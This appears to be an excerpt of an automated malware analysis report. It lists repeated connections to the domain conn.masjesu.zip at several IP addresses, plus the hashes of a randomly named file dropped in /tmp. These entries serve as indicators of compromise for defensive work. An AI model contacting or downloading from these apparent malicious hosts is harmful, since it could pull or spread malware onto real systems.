BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp

Files

/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97